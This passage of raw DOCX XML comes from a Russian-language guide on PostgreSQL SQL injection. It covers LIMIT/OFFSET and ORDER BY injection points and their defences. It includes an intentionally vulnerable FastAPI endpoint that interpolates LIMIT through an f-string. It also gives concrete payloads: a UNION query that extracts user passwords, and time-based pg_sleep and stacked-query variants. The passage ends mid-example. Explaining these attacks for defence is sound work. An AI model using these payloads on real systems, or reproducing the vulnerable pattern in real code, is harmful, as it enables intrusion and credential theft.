                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">quote_ident()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Unicode-normalize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 (stacked), 3.16 (identifier)</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ORDER BY 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integer-literal в select-list reference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номер колонки</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int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + range-check vs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">len(select_list)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 (error-based, leak count)</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ORDER BY (CASE WHEN ...)</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arbitrary expression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SQL-выражение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parametrize через index-lookup, не expression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3.3 (boolean-blind), 3.4 (time-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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UNION-payload часто попадает именно через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-injection point (потому что после LIMIT стоит конец запроса — идеальное место для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Граница: 3.1 описывает канал извлечения; 3.14.1 — точку входа.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3.14.4 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) технически создаёт boolean-blind канал через порядок строк (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN cond THEN 1 ELSE 2 END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> меняет порядок rows). Граница: 3.3 описывает извлечение по boolean response; 3.14.4 — конкретный clause, где boolean response — это row order.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(Time-based blind)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ORDER BY (CASE WHEN ... THEN pg_sleep(N) ELSE 1 END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт conditional time delay в sorting phase. Граница та же — 3.4 описывает time-channel, 3.14.4 — точку входа.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3.14.1 и 3.14.3 в драйверах с simple-protocol позволяют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0; SELECT pg_sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через LIMIT. Граница: 3.5 описывает протокольную сторону (какие драйверы пропускают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3.14 — конкретные clause-точки входа.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3.14.2 описывает ту же проблему (identifier нельзя bind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 точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-кода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; 3.16 — с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">серверного plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Граница: 3.14.2 — application-builder, 3.16 —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EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри plpgsql.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раздел 5 содержит сводные шаблоны защиты (whitelist для ORDER BY, range-check для LIMIT); 3.14 — конкретные точки, к которым эти шаблоны применяются.</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3.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> LIMIT/OFFSET integer-context — interpolated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f"LIMIT {n}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, защита через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int()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3.14.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY column_name token — whitelist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обход через Unicode homoglyphs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3.14.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY column_number — error-based leak select-list size, обход через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1; ...</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3.14.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY (CASE WHEN ...) — full expression, row-order как boolean-channel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для всех четырёх подразделов 3.14 источник проблемы один: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разработчик считает, что эти clauses "очевидно числовые" или "очевидно из whitelist"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и пропускает их через f-string / concat вместо bind-параметра или whitelist. PostgreSQL Wire Protocol устроен так, что bind-параметр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подставляется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только в expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а LIMIT/OFFSET/ORDER BY имеют свои особые контексты:</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LIMIT/OFFSET принимают expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL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-параметры работают, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только если драйвер использует extended protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только если параметр явно типизирован как integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Многие SQL-builder-ы (custom Python helpers, старые версии Hibernate ≤ 4) собирают LIMIT через string concat.</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ORDER BY column_name принимает identifier-контекст</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-параметры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не работают по протоколу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bind-параметр не может быть именем колонки). Это design, не bug. Единственный путь — whitelist + ручной quoting.</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ORDER BY column_number принимает integer-контекст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но это integer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в select-list position semantic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ошибки парсинга («column 99 does not exist») информативны и протекают в HTTP-response.</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ORDER BY (expression)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это full SQL expression, и любой user-input в нём — полноценная SQL injection (но с особым каналом извлечения через row order).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.14.1 LIMIT / OFFSET integer-context</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Pagination через user-controlled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 стандартный шаблон REST-эндпоинтов. PostgreSQL принимает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как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поэтому корректная защита — bind-параметр (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT :limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Антипаттерн: разработчик считает, что «число — это безопасно», и собирает запрос через f-string или ручной concat. Когда LIMIT идёт в конец запроса, payload-у не нужно даже закрывать кавычки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 10 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сразу синтаксически валиден. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">самая популярная точка входа для UNION-инъекций в Postgres-приложениях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что LIMIT находится в конце SELECT-выражения, и payload не ломает остальной запрос.</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app/api/v1/articles.py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Query,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@router.get("/articles")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit: str = Query("10"),   # ← string из query-string, без типизации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    offset: str = Query("0"),</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f-string в LIMIT/OFFSET</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title, published_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT {limit} OFFSET {offset}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Разработчик «знает», что limit — число, но не валидирует его на уровне типа (использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не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и подставляет напрямую в SQL. SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">text()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отправляет это как простую SQL-строку — параметризации нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта в зависимости от драйвера</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — UNION-канал (любой драйвер, single-statement):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles?limit=10%20UNION%20SELECT%20id,password,now()%20FROM%20users--&amp;offset=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После URL-decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">limit = "10 UNION SELECT id,password,now() FROM users--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер получает: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published_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
